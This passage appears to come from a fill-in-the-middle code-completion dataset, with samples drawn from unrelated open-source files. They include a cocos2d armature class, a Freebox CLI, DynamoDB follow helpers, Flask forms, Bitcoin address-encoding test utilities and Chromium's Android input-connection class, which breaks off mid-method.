this._blendFunc.src = blendFunc.src; this._blendFunc.dst = blendFunc.dst; } else { this._blendFunc.src = blendFunc; this._blendFunc.dst = dst; } }, /** * Returns the blendFunc of ccs.Armature * @returns {cc.BlendFunc} */ getBlendFunc: function () { return new cc.BlendFunc(this._blendFunc.src, this._blendFunc.dst); }, /** * set collider filter * @param {ccs.ColliderFilter} filter */ setColliderFilter: function (filter) { var locBoneDic = this._boneDic; for (var key in locBoneDic) locBoneDic[key].setColliderFilter(filter); }, /** * Returns the armatureData of ccs.Armature * @return {ccs.ArmatureData} */ getArmatureData: function () { return this.armatureData;<|fim▁hole|> * @param {ccs.ArmatureData} armatureData */ setArmatureData: function (armatureData) { this.armatureData = armatureData; }, getBatchNode: function () { return this.batchNode; }, setBatchNode: function (batchNode) { this.batchNode = batchNode; }, /** * version getter * @returns {Number} */ getVersion: function () { return this.version; }, /** * version setter * @param {Number} version */ setVersion: function (version) { this.version = version; }, _createRenderCmd: function () { if (cc._renderType === cc.game.RENDER_TYPE_CANVAS) return new ccs.Armature.CanvasRenderCmd(this); else return new ccs.Armature.WebGLRenderCmd(this); } }); var _p = ccs.Armature.prototype; /** @expose */ _p.parentBone; cc.defineGetterSetter(_p, "parentBone", _p.getParentBone, _p.setParentBone); /** @expose */ _p.body; cc.defineGetterSetter(_p, "body", _p.getBody, _p.setBody); /** @expose */ _p.colliderFilter; cc.defineGetterSetter(_p, "colliderFilter", null, _p.setColliderFilter); _p = null; /** * Allocates an armature, and use the ArmatureData named name in ArmatureDataManager to initializes the armature. * @param {String} [name] Bone name * @param {ccs.Bone} [parentBone] the parent bone * @return {ccs.Armature} * @deprecated since v3.1, please use new construction instead */ ccs.Armature.create = function (name, parentBone) { return new ccs.Armature(name, parentBone); };<|fim▁end|>
}, /** * Sets armatureData to this Armature
<|file_name|>client.py<|end_file_name|><|fim▁begin|># # Copyright 2013 Nicolas Lamirault <[email protected]>. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # import logging from cliff import command logger = logging.getLogger(__name__) class FreeboxCommand(command.Command): """Default Freebox command.""" pass class FreeboxApiVersion(FreeboxCommand): """Retrieve the Freebox OS api version.""" def take_action(self, parsed_args): logger.info("[FreeboxOS] API_Version") api_version = self.app.freebox_client.version() #print "Result: %s" % api_version logger.info('[FreeboxOS] %s\n' % api_version['api_version']) class FreeboxLogin(FreeboxCommand): """Login to the Freebox OS.""" def take_action(self, parsed_args): logger.info("[FreeboxOS] Login") self.app.freebox_client.login() # self.app.stdout.write('FreeboxOS: %s\n' % # self.app.freebox_client) logger.info('[FreeboxOS] Login response: %s' % self.app.freebox_client) class FreeboxAuthorize(FreeboxCommand): """Request authorization for this application.""" def take_action(self, parsed_args): logger.info("[FreeboxOS] Authorization request") self.app.freebox_client.ask_authorization() class FreeboxCheckAuthorization(FreeboxCommand): """Request informations about authorization for this application.""" def take_action(self, parsed_args): logger.info("[FreeboxOS] Check Authorization ") self.app.freebox_client.check_authorization() class FreeboxOpenSession(FreeboxCommand): """Open a new session to the FreeboxOS.""" def take_action(self, parsed_args): logger.info("[FreeboxOS] Open sesion") self.app.freebox_client.open_session() class FreeboxCloseSession(FreeboxCommand): """Close the current session to the FreeboxOS.""" def take_action(self, parsed_args): logger.info("[FreeboxOS] Close sesion") self.app.freebox_client.close_session() class FreeboxWifiStatus(FreeboxCommand): """Retrieve the WIFI status.""" def take_action(self, parsed_args): logger.info("[FreeboxOS] Wifi status") wifi_status = self.app.freebox_client.get_wifi_status() logger.info("[FreeboxOS] Wifi status:\n %s" % wifi_status) class FreeboxWifiConfiguration(FreeboxCommand): """Retrieve the current WIFI configuration.""" def take_action(self, parsed_args):<|fim▁hole|> class FreeboxWifiStations(FreeboxCommand): """Retrieve a list of wifi stations.""" def take_action(self, parsed_args): logger.info("[FreeboxOS] Wifi stations") wifi_stations = self.app.freebox_client.get_wifi_stations() logger.info("[FreefoxOS] Wifi stations:\n %s" % wifi_stations)<|fim▁end|>
logger.info("[FreeboxOS] Wifi configuration") wifi_config = self.app.freebox_client.get_wifi_config() logger.info("[FreeboxOS] Wifi configuration:\n %s" % wifi_config)
<|file_name|>verb.js<|end_file_name|><|fim▁begin|>define( ['helper/english', 'vendor/underscore'], function(englishHelper, _){ var persons, irregularVerbs; /** * @type {Array} */ persons = ['s1', 's2', 's3', 'p1', 'p2', 'p3']; irregularVerbs = { be: { present: ['am', 'are', 'is', 'are', 'are', 'are'], past: ['was', 'were', 'was', 'were', 'were', 'were'] }, have: { present: 'has', past: 'had' } }; /** * * @param {String} verb * @param {String} person * @return {Object} */ function irregularPresent(verb, person) { var result = false, personIndex; if (typeof irregularVerbs[verb] != 'undefined' && typeof irregularVerbs[verb].present != 'undefined') { result = irregularVerbs[verb].present; if (_.isArray(result)) { personIndex = persons.indexOf(person); return {result: result[personIndex], personalize: false}; } if ('s3' == person) { return {result: result, personalize: false}; } } return {result: verb, personalize: true}; } /** * * @param {String} defaultForm present tense, plural, 3rd person * @param {String} person to use, one of s1-s3, p1-p3 * @return {String} */ function personalize(defaultForm, person){ var shortenedVerb; switch (person) { case 's3': shortenedVerb = defaultForm.substr(0, defaultForm.length - 1); if (englishHelper.checkConsonantEnding(shortenedVerb)) { if (defaultForm[defaultForm.length-1] == 'y') { return shortenedVerb + 'ies'; } else if (defaultForm[defaultForm.length-1] == 'o') { return defaultForm + 'es'; } } return defaultForm + 's'; default: return defaultForm; } }<|fim▁hole|> * * @param {String} defaultForm present tense, plural, 3rd person * @param {String} person to use, one of s1-s3, p1-p3 * @return {*} */ function present(defaultForm, person){ var irregularResult, personIndex; personIndex = persons.indexOf(person); if (personIndex == -1) { throw 'Given person is not allowed'; } irregularResult = irregularPresent(defaultForm, person); if (irregularResult.personalize) { return personalize(irregularResult.result, person); } return irregularResult.result; } return { present: present }; } );<|fim▁end|>
/**
<|file_name|>db_actions.py<|end_file_name|><|fim▁begin|>from boto3.dynamodb.conditions import Attr def update_users_followers(username, follower_id, table, remove=False): ''' Find all the users that %username% follows and update their "followers" list and "followers_count" amount ''' item = table.get_item(Key={'username': username}).get('Item', False) item['followers'].remove(follower_id) if remove else item['followers'].append(follower_id) table.update_item( Key={ 'username': username }, UpdateExpression='SET followers = :val1', ExpressionAttributeValues={ ':val1': item['followers'], }, ) def follow_user(username, user_id, table): item = table.get_item(Key={'username': username})['Item'] new_follow = set([user_id]) - set(item['follow']) - set([username]) if not new_follow: return False new_item = table.update_item( Key={ 'username': username }, UpdateExpression='SET follow = list_append(follow, :val1), follow_count = follow_count + :val2', ExpressionAttributeValues={ ':val1': list(new_follow), ':val2': len(new_follow) }, ReturnValues="UPDATED_NEW" ) update_users_followers(user_id, username, table, remove=False) return True # update_user_real_follow_count(username) def get_followers_list(username, table): user_following = table.get_item(Key={'username': username})['Item']['follow'] return table.scan( FilterExpression=Attr('username').is_in(user_following) )['Items'] def unfollow_user(username, user_id, table): item = table.get_item(Key={'username': username})['Item']<|fim▁hole|> Key={ 'username': username }, UpdateExpression='SET follow = :val1', ExpressionAttributeValues={ ':val1': item['follow'], } ) update_users_followers(user_id, username, table, remove=True) def create_user(update, table): username = str(update['message']['chat']['id']) followers = table.scan( FilterExpression=Attr('follow').contains(username) ) table.put_item( Item={ 'username': username, 'first_name': update.message.from_user.first_name.upper(), 'last_name': update.message.from_user.last_name.upper() if update.message.from_user.last_name else None, 'follow': [], 'follow_count': 0, 'followers': [x['username'] for x in followers['Items']], 'photo_id': 0 } ) def update_user(update, table): username = str(update['message']['chat']['id']) followers = table.scan( FilterExpression=Attr('follow').contains(username) ) item = table.get_item(Key={'username': username})['Item'] item['first_name'] = update.message.from_user.first_name.upper() if update.message.from_user.last_name: item['last_name'] = update.message.from_user.last_name.upper() item['follow_count'] = len(item['follow']) item['followers'] = [x['username'] for x in followers['Items']] item['photo_id'] = item.get('photo_id', 0) table.put_item(Item=item) def update_user_photo(photo, username, table): table.update_item( Key={ 'username': username }, UpdateExpression='SET photo_id = :val1', ExpressionAttributeValues={ ':val1': photo[-1]['file_id'], }, )<|fim▁end|>
item['follow'].remove(user_id) table.update_item(
<|file_name|>Gruntfile.js<|end_file_name|><|fim▁begin|>/*global module:false*/ module.exports = function(grunt) { // Load all tasks require('load-grunt-tasks')(grunt); // Project configuration. grunt.initConfig({ pkg: grunt.file.readJSON('package.json'), meta: { banner: '/*! <%= pkg.title || pkg.name %> - v<%= pkg.version %> - ' +<|fim▁hole|> ' Licensed <%= pkg.licenses.map(function(license) { return license.type; }).join(", ") %> */' }, concat: { dist: { src: ['src/<%= pkg.name %>.js'], dest: 'dist/<%= pkg.name %>.js' } }, qunit: { files: ['test/**/*.html'] }, watch: { files: '<%= jshint.all %>', tasks: [ 'jshint', 'qunit', 'concat', 'uglify' ] }, jshint: { options: { jshintrc: '.jshintrc' }, all: ['src/**/*.js', 'test/**/*.js'] }, uglify: { options: { banner: '<%= meta.banner %>' }, dist: { src: ['<%= concat.dist.dest %>'], dest: 'dist/<%= pkg.name %>.min.js' } } }); // Register tasks grunt.registerTask('default', [ 'build' ]); grunt.registerTask('dev', [ 'build', 'watch' ]); grunt.registerTask('build', [ 'jshint', 'qunit', 'concat', 'uglify' ]); grunt.registerTask('test', [ 'jshint', 'qunit' ]); };<|fim▁end|>
'<%= pkg.homepage ? "* " + pkg.homepage : "" %>' + '* Copyright (c) <%= grunt.template.today("yyyy") %> <%= pkg.author.name %>;' +
<|file_name|>Sort.java<|end_file_name|><|fim▁begin|>package com.ftninformatika.bisis.opac.search; import lombok.AllArgsConstructor; import lombok.Getter; import lombok.NoArgsConstructor; import lombok.Setter; /** * @author badf00d21 15.8.19. */ @Getter @Setter @AllArgsConstructor @NoArgsConstructor public class Sort { private SortType type; private Boolean ascending; public SortType getType() { return type; } public void setType(String st) { switch (st) { case "AU_sort" : this.type = SortType.SORT_AUTHOR; break;<|fim▁hole|> case "TI_sort" : this.type = SortType.SORT_TITLE; break; default: this.type = null; } } }<|fim▁end|>
case "PY_sort" : this.type = SortType.SORT_YEAR; break; case "PU_sort" : this.type = SortType.SORT_PUBLISHER; break;
<|file_name|>imageCover.tsx<|end_file_name|><|fim▁begin|>import {Event, ipcRenderer} from 'electron'<|fim▁hole|>import { ISettings } from '../../settings' import { TrelloTypes } from '../../TrelloInterfaces' export default class ImageCover extends React.Component<IimageCoverProps, {}> { public render () { let extension: string = this.props.attData.url.match(/.+([.].+)/)[1] if (this.props.settings !== undefined && !this.props.settings.animateGIFs && extension === '.gif') { extension = '.png' } const filename = `${this.props.attData.id}${extension}` const pathToImage = `${globalProperties.getPath()}attachments/${filename}` return ( <div style={{backgroundColor: this.props.attData.edgeColor}}> <img className='imgCover' src={pathToImage}/> </div> ) } } interface IimageCoverProps { attData: TrelloTypes.Attachment // TODO - remove this and use Redux settings: ISettings }<|fim▁end|>
import * as React from 'react' import * as ReactDOM from 'react-dom' import * as globalProperties from '../../globalProperties' import * as HelperUI from '../../HelperUI'
<|file_name|>forms.py<|end_file_name|><|fim▁begin|>from flask_wtf import Form from wtforms import TextField, DecimalField, TextAreaField, DateField, validators, PasswordField, BooleanField class CommentForm(Form):<|fim▁hole|> text = TextField('Title', [validators.Required()]) text2 = TextAreaField('Body') longitude = DecimalField('Longitude') latitude = DecimalField('Longitude') date = DateField('Date') class SignupForm(Form): username = TextField('Username', [validators.Required()]) password = PasswordField('Password', [validators.Required(), validators.EqualTo('confirm', message='Passwords must match')]) confirm = PasswordField('Confirm Password', [validators.Required()]) email = TextField('eMail', [validators.Required(),validators.Email()]) #accept_tos = BooleanField('I accept the TOS', [validators.Required]) class LoginForm(Form): username = TextField('Username', [validators.Required()]) password = PasswordField('Password', [validators.Required()]) class PasswordResetForm(Form): username = TextField('Username') email = TextField('eMail') class PasswordChangeForm(Form): password = PasswordField('Password', [validators.Required()])<|fim▁end|>
<|file_name|>address.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3 # Copyright (c) 2016-2021 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Encode and decode Bitcoin addresses. - base58 P2PKH and P2SH addresses. - bech32 segwit v0 P2WPKH and P2WSH addresses. - bech32m segwit v1 P2TR addresses.""" import enum import unittest from .script import ( CScript, OP_0, OP_TRUE, hash160, hash256, sha256, taproot_construct, ) from .segwit_addr import encode_segwit_address from .util import assert_equal ADDRESS_BCRT1_UNSPENDABLE = 'bcrt1qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq3xueyj' ADDRESS_BCRT1_UNSPENDABLE_DESCRIPTOR = 'addr(bcrt1qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq3xueyj)#juyq9d97' # Coins sent to this address can be spent with a witness stack of just OP_TRUE ADDRESS_BCRT1_P2WSH_OP_TRUE = 'bcrt1qft5p2uhsdcdc3l2ua4ap5qqfg4pjaqlp250x7us7a8qqhrxrxfsqseac85' class AddressType(enum.Enum): bech32 = 'bech32' p2sh_segwit = 'p2sh-segwit' legacy = 'legacy' # P2PKH chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz' def create_deterministic_address_bcrt1_p2tr_op_true(): """ Generates a deterministic bech32m address (segwit v1 output) that can be spent with a witness stack of OP_TRUE and the control block with internal public key (script-path spending). Returns a tuple with the generated address and the internal key. """ internal_key = (1).to_bytes(32, 'big') scriptPubKey = taproot_construct(internal_key, [(None, CScript([OP_TRUE]))]).scriptPubKey address = encode_segwit_address("bcrt", 1, scriptPubKey[2:]) assert_equal(address, 'bcrt1p9yfmy5h72durp7zrhlw9lf7jpwjgvwdg0jr0lqmmjtgg83266lqsekaqka') return (address, internal_key) def byte_to_base58(b, version): result = '' str = b.hex() str = chr(version).encode('latin-1').hex() + str checksum = hash256(bytes.fromhex(str)).hex() str += checksum[:8] value = int('0x' + str, 0) while value > 0: result = chars[value % 58] + result value //= 58 while (str[:2] == '00'): result = chars[0] + result str = str[2:] return result def base58_to_byte(s):<|fim▁hole|> if not s: return b'' n = 0 for c in s: n *= 58 assert c in chars digit = chars.index(c) n += digit h = '%x' % n if len(h) % 2: h = '0' + h res = n.to_bytes((n.bit_length() + 7) // 8, 'big') pad = 0 for c in s: if c == chars[0]: pad += 1 else: break res = b'\x00' * pad + res # Assert if the checksum is invalid assert_equal(hash256(res[:-4])[:4], res[-4:]) return res[1:-4], int(res[0]) def keyhash_to_p2pkh(hash, main=False): assert len(hash) == 20 version = 0 if main else 111 return byte_to_base58(hash, version) def scripthash_to_p2sh(hash, main=False): assert len(hash) == 20 version = 5 if main else 196 return byte_to_base58(hash, version) def key_to_p2pkh(key, main=False): key = check_key(key) return keyhash_to_p2pkh(hash160(key), main) def script_to_p2sh(script, main=False): script = check_script(script) return scripthash_to_p2sh(hash160(script), main) def key_to_p2sh_p2wpkh(key, main=False): key = check_key(key) p2shscript = CScript([OP_0, hash160(key)]) return script_to_p2sh(p2shscript, main) def program_to_witness(version, program, main=False): if (type(program) is str): program = bytes.fromhex(program) assert 0 <= version <= 16 assert 2 <= len(program) <= 40 assert version > 0 or len(program) in [20, 32] return encode_segwit_address("sys" if main else "bcrt", version, program) def script_to_p2wsh(script, main=False): script = check_script(script) return program_to_witness(0, sha256(script), main) def key_to_p2wpkh(key, main=False): key = check_key(key) return program_to_witness(0, hash160(key), main) def script_to_p2sh_p2wsh(script, main=False): script = check_script(script) p2shscript = CScript([OP_0, sha256(script)]) return script_to_p2sh(p2shscript, main) def check_key(key): if (type(key) is str): key = bytes.fromhex(key) # Assuming this is hex string if (type(key) is bytes and (len(key) == 33 or len(key) == 65)): return key assert False def check_script(script): if (type(script) is str): script = bytes.fromhex(script) # Assuming this is hex string if (type(script) is bytes or type(script) is CScript): return script assert False class TestFrameworkScript(unittest.TestCase): def test_base58encodedecode(self): def check_base58(data, version): self.assertEqual(base58_to_byte(byte_to_base58(data, version)), (data, version)) check_base58(bytes.fromhex('1f8ea1702a7bd4941bca0941b852c4bbfedb2e05'), 111) check_base58(bytes.fromhex('3a0b05f4d7f66c3ba7009f453530296c845cc9cf'), 111) check_base58(bytes.fromhex('41c1eaf111802559bad61b60d62b1f897c63928a'), 111) check_base58(bytes.fromhex('0041c1eaf111802559bad61b60d62b1f897c63928a'), 111) check_base58(bytes.fromhex('000041c1eaf111802559bad61b60d62b1f897c63928a'), 111) check_base58(bytes.fromhex('00000041c1eaf111802559bad61b60d62b1f897c63928a'), 111) check_base58(bytes.fromhex('1f8ea1702a7bd4941bca0941b852c4bbfedb2e05'), 0) check_base58(bytes.fromhex('3a0b05f4d7f66c3ba7009f453530296c845cc9cf'), 0) check_base58(bytes.fromhex('41c1eaf111802559bad61b60d62b1f897c63928a'), 0) check_base58(bytes.fromhex('0041c1eaf111802559bad61b60d62b1f897c63928a'), 0) check_base58(bytes.fromhex('000041c1eaf111802559bad61b60d62b1f897c63928a'), 0) check_base58(bytes.fromhex('00000041c1eaf111802559bad61b60d62b1f897c63928a'), 0)<|fim▁end|>
"""Converts a base58-encoded string to its data and version. Throws if the base58 checksum is invalid."""
<|file_name|>AdapterInputConnection.java<|end_file_name|><|fim▁begin|>// Copyright 2013 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. package org.chromium.content.browser.input; import android.os.SystemClock; import android.text.Editable; import android.text.InputType; import android.text.Selection; import android.text.TextUtils; import android.view.KeyCharacterMap; import android.view.KeyEvent; import android.view.View; import android.view.inputmethod.BaseInputConnection; import android.view.inputmethod.EditorInfo; import android.view.inputmethod.ExtractedText; import android.view.inputmethod.ExtractedTextRequest; import org.chromium.base.Log; import org.chromium.base.VisibleForTesting; import org.chromium.blink_public.web.WebInputEventType; import org.chromium.blink_public.web.WebTextInputFlags; import org.chromium.ui.base.ime.TextInputType; /** * InputConnection is created by ContentView.onCreateInputConnection. * It then adapts android's IME to chrome's RenderWidgetHostView using the * native ImeAdapterAndroid via the class ImeAdapter. */ public class AdapterInputConnection extends BaseInputConnection { private static final String TAG = "cr.InputConnection"; private static final boolean DEBUG = false; /** * Selection value should be -1 if not known. See EditorInfo.java for details. */ public static final int INVALID_SELECTION = -1; public static final int INVALID_COMPOSITION = -1; private final View mInternalView; private final ImeAdapter mImeAdapter; private final Editable mEditable; private boolean mSingleLine; private int mNumNestedBatchEdits = 0; private int mPendingAccent; private int mLastUpdateSelectionStart = INVALID_SELECTION; private int mLastUpdateSelectionEnd = INVALID_SELECTION; private int mLastUpdateCompositionStart = INVALID_COMPOSITION; private int mLastUpdateCompositionEnd = INVALID_COMPOSITION; @VisibleForTesting AdapterInputConnection(View view, ImeAdapter imeAdapter, Editable editable, EditorInfo outAttrs) { super(view, true); mInternalView = view; mImeAdapter = imeAdapter; mImeAdapter.setInputConnection(this); mEditable = editable; // The editable passed in might have been in use by a prior keyboard and could have had // prior composition spans set. To avoid keyboard conflicts, remove all composing spans // when taking ownership of an existing Editable. finishComposingText(); mSingleLine = true; outAttrs.imeOptions = EditorInfo.IME_FLAG_NO_FULLSCREEN | EditorInfo.IME_FLAG_NO_EXTRACT_UI; outAttrs.inputType = EditorInfo.TYPE_CLASS_TEXT | EditorInfo.TYPE_TEXT_VARIATION_WEB_EDIT_TEXT; int inputType = imeAdapter.getTextInputType(); int inputFlags = imeAdapter.getTextInputFlags(); if ((inputFlags & WebTextInputFlags.AutocompleteOff) != 0) { outAttrs.inputType |= EditorInfo.TYPE_TEXT_FLAG_NO_SUGGESTIONS; } if (inputType == TextInputType.TEXT) { // Normal text field outAttrs.imeOptions |= EditorInfo.IME_ACTION_GO; if ((inputFlags & WebTextInputFlags.AutocorrectOff) == 0) { outAttrs.inputType |= EditorInfo.TYPE_TEXT_FLAG_AUTO_CORRECT; } } else if (inputType == TextInputType.TEXT_AREA || inputType == TextInputType.CONTENT_EDITABLE) { outAttrs.inputType |= EditorInfo.TYPE_TEXT_FLAG_MULTI_LINE; if ((inputFlags & WebTextInputFlags.AutocorrectOff) == 0) { outAttrs.inputType |= EditorInfo.TYPE_TEXT_FLAG_AUTO_CORRECT; } outAttrs.imeOptions |= EditorInfo.IME_ACTION_NONE; mSingleLine = false; } else if (inputType == TextInputType.PASSWORD) { // Password outAttrs.inputType = InputType.TYPE_CLASS_TEXT | InputType.TYPE_TEXT_VARIATION_WEB_PASSWORD; outAttrs.imeOptions |= EditorInfo.IME_ACTION_GO; } else if (inputType == TextInputType.SEARCH) { // Search outAttrs.imeOptions |= EditorInfo.IME_ACTION_SEARCH; } else if (inputType == TextInputType.URL) { // Url outAttrs.inputType = InputType.TYPE_CLASS_TEXT | InputType.TYPE_TEXT_VARIATION_URI; outAttrs.imeOptions |= EditorInfo.IME_ACTION_GO; } else if (inputType == TextInputType.EMAIL) { // Email outAttrs.inputType = InputType.TYPE_CLASS_TEXT | InputType.TYPE_TEXT_VARIATION_WEB_EMAIL_ADDRESS; outAttrs.imeOptions |= EditorInfo.IME_ACTION_GO; } else if (inputType == TextInputType.TELEPHONE) { // Telephone // Number and telephone do not have both a Tab key and an // action in default OSK, so set the action to NEXT outAttrs.inputType = InputType.TYPE_CLASS_PHONE; outAttrs.imeOptions |= EditorInfo.IME_ACTION_NEXT; } else if (inputType == TextInputType.NUMBER) { // Number outAttrs.inputType = InputType.TYPE_CLASS_NUMBER | InputType.TYPE_NUMBER_VARIATION_NORMAL | InputType.TYPE_NUMBER_FLAG_DECIMAL; outAttrs.imeOptions |= EditorInfo.IME_ACTION_NEXT; } // Handling of autocapitalize. Blink will send the flag taking into account the element's // type. This is not using AutocapitalizeNone because Android does not autocapitalize by // default and there is no way to express no capitalization. // Autocapitalize is meant as a hint to the virtual keyboard. if ((inputFlags & WebTextInputFlags.AutocapitalizeCharacters) != 0) { outAttrs.inputType |= InputType.TYPE_TEXT_FLAG_CAP_CHARACTERS; } else if ((inputFlags & WebTextInputFlags.AutocapitalizeWords) != 0) { outAttrs.inputType |= InputType.TYPE_TEXT_FLAG_CAP_WORDS; } else if ((inputFlags & WebTextInputFlags.AutocapitalizeSentences) != 0) { outAttrs.inputType |= InputType.TYPE_TEXT_FLAG_CAP_SENTENCES; } // Content editable doesn't use autocapitalize so we need to set it manually. if (inputType == TextInputType.CONTENT_EDITABLE) { outAttrs.inputType |= InputType.TYPE_TEXT_FLAG_CAP_SENTENCES; } outAttrs.initialSelStart = Selection.getSelectionStart(mEditable); outAttrs.initialSelEnd = Selection.getSelectionEnd(mEditable); mLastUpdateSelectionStart = outAttrs.initialSelStart; mLastUpdateSelectionEnd = outAttrs.initialSelEnd; if (DEBUG) Log.w(TAG, "Constructor called with outAttrs: " + outAttrs); Selection.setSelection(mEditable, outAttrs.initialSelStart, outAttrs.initialSelEnd); updateSelectionIfRequired(); } /** * Updates the AdapterInputConnection's internal representation of the text being edited and * its selection and composition properties. The resulting Editable is accessible through the * getEditable() method. If the text has not changed, this also calls updateSelection on the * InputMethodManager. * * @param text The String contents of the field being edited. * @param selectionStart The character offset of the selection start, or the caret position if * there is no selection. * @param selectionEnd The character offset of the selection end, or the caret position if there * is no selection. * @param compositionStart The character offset of the composition start, or -1 if there is no * composition. * @param compositionEnd The character offset of the composition end, or -1 if there is no * selection. * @param isNonImeChange True when the update was caused by non-IME (e.g. Javascript). */ @VisibleForTesting public void updateState(String text, int selectionStart, int selectionEnd, int compositionStart, int compositionEnd, boolean isNonImeChange) { if (DEBUG) { Log.w(TAG, "updateState [" + text + "] [" + selectionStart + " " + selectionEnd + "] [" + compositionStart + " " + compositionEnd + "] [" + isNonImeChange + "]"); } // If this update is from the IME, no further state modification is necessary because the // state should have been updated already by the IM framework directly. if (!isNonImeChange) return; // Non-breaking spaces can cause the IME to get confused. Replace with normal spaces. text = text.replace('\u00A0', ' '); selectionStart = Math.min(selectionStart, text.length()); selectionEnd = Math.min(selectionEnd, text.length()); compositionStart = Math.min(compositionStart, text.length()); compositionEnd = Math.min(compositionEnd, text.length()); String prevText = mEditable.toString(); boolean textUnchanged = prevText.equals(text); if (!textUnchanged) { mEditable.replace(0, mEditable.length(), text); } Selection.setSelection(mEditable, selectionStart, selectionEnd); if (compositionStart == compositionEnd) { removeComposingSpans(mEditable); } else { super.setComposingRegion(compositionStart, compositionEnd); } updateSelectionIfRequired(); } /** * @return Editable object which contains the state of current focused editable element. */ @Override public Editable getEditable() { return mEditable; } /** * Sends selection update to the InputMethodManager unless we are currently in a batch edit or * if the exact same selection and composition update was sent already. */ private void updateSelectionIfRequired() { if (mNumNestedBatchEdits != 0) return; int selectionStart = Selection.getSelectionStart(mEditable); int selectionEnd = Selection.getSelectionEnd(mEditable); int compositionStart = getComposingSpanStart(mEditable); int compositionEnd = getComposingSpanEnd(mEditable); // Avoid sending update if we sent an exact update already previously. if (mLastUpdateSelectionStart == selectionStart && mLastUpdateSelectionEnd == selectionEnd && mLastUpdateCompositionStart == compositionStart && mLastUpdateCompositionEnd == compositionEnd) { return; } if (DEBUG) { Log.w(TAG, "updateSelectionIfRequired [" + selectionStart + " " + selectionEnd + "] [" + compositionStart + " " + compositionEnd + "]"); } // updateSelection should be called every time the selection or composition changes // if it happens not within a batch edit, or at the end of each top level batch edit. getInputMethodManagerWrapper().updateSelection( mInternalView, selectionStart, selectionEnd, compositionStart, compositionEnd); mLastUpdateSelectionStart = selectionStart; mLastUpdateSelectionEnd = selectionEnd; mLastUpdateCompositionStart = compositionStart; mLastUpdateCompositionEnd = compositionEnd; } /** * @see BaseInputConnection#setComposingText(java.lang.CharSequence, int) */ @Override public boolean setComposingText(CharSequence text, int newCursorPosition) { if (DEBUG) Log.w(TAG, "setComposingText [" + text + "] [" + newCursorPosition + "]"); if (maybePerformEmptyCompositionWorkaround(text)) return true; mPendingAccent = 0; super.setComposingText(text, newCursorPosition); updateSelectionIfRequired(); return mImeAdapter.checkCompositionQueueAndCallNative(text, newCursorPosition, false); } /** * @see BaseInputConnection#commitText(java.lang.CharSequence, int) */ @Override public boolean commitText(CharSequence text, int newCursorPosition) { if (DEBUG) Log.w(TAG, "commitText [" + text + "] [" + newCursorPosition + "]"); if (maybePerformEmptyCompositionWorkaround(text)) return true; mPendingAccent = 0; super.commitText(text, newCursorPosition); updateSelectionIfRequired(); return mImeAdapter.checkCompositionQueueAndCallNative(text, newCursorPosition, text.length() > 0); } /** * @see BaseInputConnection#performEditorAction(int) */ @Override public boolean performEditorAction(int actionCode) { if (DEBUG) Log.w(TAG, "performEditorAction [" + actionCode + "]"); if (actionCode == EditorInfo.IME_ACTION_NEXT) { restartInput(); // Send TAB key event long timeStampMs = SystemClock.uptimeMillis(); mImeAdapter.sendSyntheticKeyEvent( WebInputEventType.RawKeyDown, timeStampMs, KeyEvent.KEYCODE_TAB, 0, 0); } else { mImeAdapter.sendKeyEventWithKeyCode(KeyEvent.KEYCODE_ENTER, KeyEvent.FLAG_SOFT_KEYBOARD | KeyEvent.FLAG_KEEP_TOUCH_MODE | KeyEvent.FLAG_EDITOR_ACTION); } return true; } /** * @see BaseInputConnection#performContextMenuAction(int) */ @Override public boolean performContextMenuAction(int id) { if (DEBUG) Log.w(TAG, "performContextMenuAction [" + id + "]"); switch (id) { case android.R.id.selectAll: return mImeAdapter.selectAll(); case android.R.id.cut: return mImeAdapter.cut(); case android.R.id.copy: return mImeAdapter.copy(); case android.R.id.paste: return mImeAdapter.paste(); default: return false; } } /** * @see BaseInputConnection#getExtractedText(android.view.inputmethod.ExtractedTextRequest, * int) */ @Override public ExtractedText getExtractedText(ExtractedTextRequest request, int flags) { if (DEBUG) Log.w(TAG, "getExtractedText"); ExtractedText et = new ExtractedText(); et.text = mEditable.toString(); et.partialEndOffset = mEditable.length(); et.selectionStart = Selection.getSelectionStart(mEditable); et.selectionEnd = Selection.getSelectionEnd(mEditable); et.flags = mSingleLine ? ExtractedText.FLAG_SINGLE_LINE : 0; return et; } /** * @see BaseInputConnection#beginBatchEdit() */ @Override public boolean beginBatchEdit() { if (DEBUG) Log.w(TAG, "beginBatchEdit [" + (mNumNestedBatchEdits == 0) + "]"); mNumNestedBatchEdits++; return true; } /** * @see BaseInputConnection#endBatchEdit() */ @Override public boolean endBatchEdit() { if (mNumNestedBatchEdits == 0) return false; --mNumNestedBatchEdits; if (DEBUG) Log.w(TAG, "endBatchEdit [" + (mNumNestedBatchEdits == 0) + "]"); if (mNumNestedBatchEdits == 0) updateSelectionIfRequired(); return mNumNestedBatchEdits != 0; } /** * @see BaseInputConnection#deleteSurroundingText(int, int) */ @Override public boolean deleteSurroundingText(int beforeLength, int afterLength) { return deleteSurroundingTextImpl(beforeLength, afterLength, false); } /** * Check if the given {@code index} is between UTF-16 surrogate pair. * @param str The String. * @param index The index * @return True if the index is between UTF-16 surrogate pair, false otherwise. */ @VisibleForTesting static boolean isIndexBetweenUtf16SurrogatePair(CharSequence str, int index) { return index > 0 && index < str.length() && Character.isHighSurrogate(str.charAt(index - 1)) && Character.isLowSurrogate(str.charAt(index)); } private boolean deleteSurroundingTextImpl( int beforeLength, int afterLength, boolean fromPhysicalKey) { if (DEBUG) { Log.w(TAG, "deleteSurroundingText [" + beforeLength + " " + afterLength + " " + fromPhysicalKey + "]"); } if (mPendingAccent != 0) { finishComposingText(); } int originalBeforeLength = beforeLength; int originalAfterLength = afterLength; int selectionStart = Selection.getSelectionStart(mEditable); int selectionEnd = Selection.getSelectionEnd(mEditable); int availableBefore = 